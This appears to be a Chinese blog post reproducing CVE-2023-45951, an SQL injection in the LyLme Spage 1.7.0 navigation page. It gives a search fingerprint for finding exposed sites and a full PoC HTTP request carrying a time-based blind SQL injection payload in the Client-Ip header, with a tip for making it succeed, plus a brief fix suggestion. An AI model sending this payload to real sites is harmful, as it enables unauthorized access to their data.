当前位置: 首页 > article >正文

六零导航页SQL注入漏洞复现(CVE-2023-45951)

0x01 产品简介

   LyLme Spage(六零导航页)是中国六零(LyLme)开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口,支持后台添加链接、自定义搜索引擎,沉淀最具价值链接,全站无商业推广,简约而不简单。

0x02 漏洞概述

   LyLme Spage v1.7.0版本存在安全漏洞,该漏洞源于通过function.php的$userip参数发现包含 SQL 注入漏洞,未经授权的攻击者可通过该漏洞获取敏感信息,进一步利用可造成主机失陷。

0x03 影响范围

LyLme Spage 1.7.0

0x04 复现环境

title=="上网导航 - LyLme Spage"

0x05 漏洞复现

PoC

POST /apply/index.php?submit=post HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Client-Ip: 0'>if(1,sleep(10),2)>'

url=http%3A%2F%2Fbaidu.com&name=test&group_id=1&icon=&authcode=

延时10秒 

PS:漏洞存在于 HTTP Header 的 Client-Ip 字段,请求体中url字段值每请求一次就需要更换一次,不然无法成功

0x06 修复建议 

 在get_real_ip 中检查验证IP合法性,防止SQL注入


http://www.kler.cn/a/104969.html

相关文章:

  • RabbitMQ基础篇 笔记
  • Spring Boot集成Swagger接口分类与各元素排序问题
  • 基于WebRTC构建的程序因虚拟内存不足导致闪退问题的排查以及解决办法的探究
  • 【ELK】日志系统部署
  • PHP 数据库交互优化,根据传参查询
  • 深入理解强化学习——强化学习的历史:近代强化学习的发展
  • 0037【Edabit ★☆☆☆☆☆】【修改Bug 2】Buggy Code (Part 2)
  • k8s 1.28版本:使用StorageClass动态创建PV,SelfLink 问题修复
  • HarmonyOS鸿蒙原生应用开发设计- 华为分享图标
  • Vue3中的v-model
  • docker自动构建jar镜像,自动发布最新镜像的简单shell脚本
  • 【码银送书第九期】《ChatGPT 驱动软件开发:AI 在软件研发全流程中的革新与实践》
  • 【CMN】Power management
  • 【深度学习实验】循环神经网络(五):基于GRU的语言模型训练(包括自定义门控循环单元GRU)
  • 26装饰器3(在面向对象的过程中使用装饰器)
  • 墨西哥专线大型工程设备海运
  • 0基础学习PyFlink——使用Table API实现SQL功能
  • uniapp实现登录组件之外区域置灰并引导登录
  • 从零开始 Spring Cloud 15:多级缓存
  • 16 用于NOMA IoT网络上行链路安全速率最大化的HAP和UAV协作框架